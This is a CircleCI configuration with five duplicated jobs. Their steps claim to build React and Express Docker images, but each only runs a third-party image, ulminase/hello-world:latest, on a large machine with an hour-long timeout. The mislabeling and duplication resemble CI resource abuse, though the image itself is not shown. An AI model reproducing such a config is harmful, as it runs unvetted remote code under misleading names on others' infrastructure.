version: 2
jobs:
  Reactzz:
    resource_class: large
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build react application Docker image
          no_output_timeout : 1h
          command: |
            docker run -e CI=true ulminase/hello-world:latest
      ###############################################################
  Expresszz:
      resource_class: large
      docker:
        - image: docker:18.06.3-ce-git
      steps:
        - checkout
        - setup_remote_docker
        - run:
            name: Build Express application Docker image
            no_output_timeout : 1h
            command: |
              docker run -e CI=true ulminase/hello-world:latest
  React1zz:
    resource_class: large
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build react application Docker image
          no_output_timeout : 1h
          command: |
            docker run -e CI=true ulminase/hello-world:latest
      
  Express1zz:
      resource_class: large
      docker:
        - image: docker:18.06.3-ce-git
      steps:
        - checkout
        - setup_remote_docker
        - run:
            name: Build Express application Docker image
            no_output_timeout : 1h
            command: |
              docker run -e CI=true ulminase/hello-world:latest
  React2zz:
    resource_class: large
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build react application Docker image
          no_output_timeout : 1h
          command: |
            docker run -e CI=true ulminase/hello-world:latest
      
  
        
        
workflows:
  version: 2
  build_test_feature:
    jobs:
      - Reactzz:
          filters:
            branches:
              ignore:
                - main
                - master
      - Expresszz:
          filters:
            branches:
              ignore:
                - main
                - master
      - React1zz:
          filters:
            branches:
              ignore:
                - main
                - master
      - Express1zz:
          filters:
            branches:
              ignore:
                - main
                - master
      - React2zz:
          filters:
            branches:
              ignore:
                - main
                - master
      
